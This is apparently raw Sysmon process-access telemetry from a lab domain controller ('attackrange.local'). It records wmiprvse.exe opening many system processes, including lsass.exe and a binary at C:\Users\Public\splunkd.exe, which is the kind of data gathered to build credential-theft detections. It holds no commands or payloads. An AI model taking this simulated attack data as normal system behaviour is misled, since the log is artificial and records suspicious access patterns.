15:59:40.881{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027002Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.881{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027001Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.881{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027000Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.881{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026999Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.881{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026998Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.881{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026997Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.881{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026996Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.881{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026995Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026994Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026993Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026992Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026991Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026990Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026989Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026988Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026987Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026986Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026985Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026984Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026983Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 